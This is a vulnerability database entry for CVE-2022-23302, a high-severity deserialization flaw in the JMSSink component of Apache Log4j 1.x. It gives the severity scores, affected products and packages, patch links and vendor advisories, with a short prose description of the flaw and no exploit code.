CVE-2022-23302

CWE-502Deserialization of Untrusted Data11 documents7 sources
Severity
8.8HIGH
EPSS
0.6%
top 29.23%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
25
Apache Software Foundation Apache Log4j 1.XOracle Communications Offline Mediation ControllerOracle E-business Suite Cloud Manager AND Cloud Backup Module+22 more
Timeline
PublishedJan 18
Latest updateJun 23

Description

JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSS

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:HExploitability: 2.8 | Impact: 5.9

Affected Packages29 packages

CVEListV5apache_software_foundation/apache_log4j_1.x1.0.1unspecified+1
Debianapache-log4j1.2< 1.2.17-10+deb11u1+3
Ubuntuapache-log4j1.2< 1.2.17-8+deb10u1ubuntu0.2+3
NVDapache/log4j1.0.11.2.17
Mavenlog4j:log4j1.2.17

Patches

Patch: www.oracle.comPatch: www.oracle.comPatch: www.oracle.com

🔴Vulnerability Details

6
OSV
apache-log4j1.2 vulnerabilities2025-06-23
OSV
apache-log4j1.2 vulnerabilities2023-04-05
GHSA
Deserialization of Untrusted Data in Log4j 1.x2022-01-21
OSV
Deserialization of Untrusted Data in Log4j 1.x2022-01-21
OSV
CVE-2022-23302: JMSSink in all versions of Log4j 12022-01-18

📋Vendor Advisories

4
Ubuntu
Apache Log4j vulnerabilities2025-06-23
Ubuntu
Apache Log4j vulnerabilities2023-04-05
Red Hat
log4j: Remote code execution in Log4j 1.x when application is configured to use JMSSink2022-01-18
Debian
CVE-2022-23302: apache-log4j1.2 - JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrust...2022
CVE-2022-23302 (HIGH CVSS 8.8) | JMSSink in all versions of Log4j 1. | cvebase.io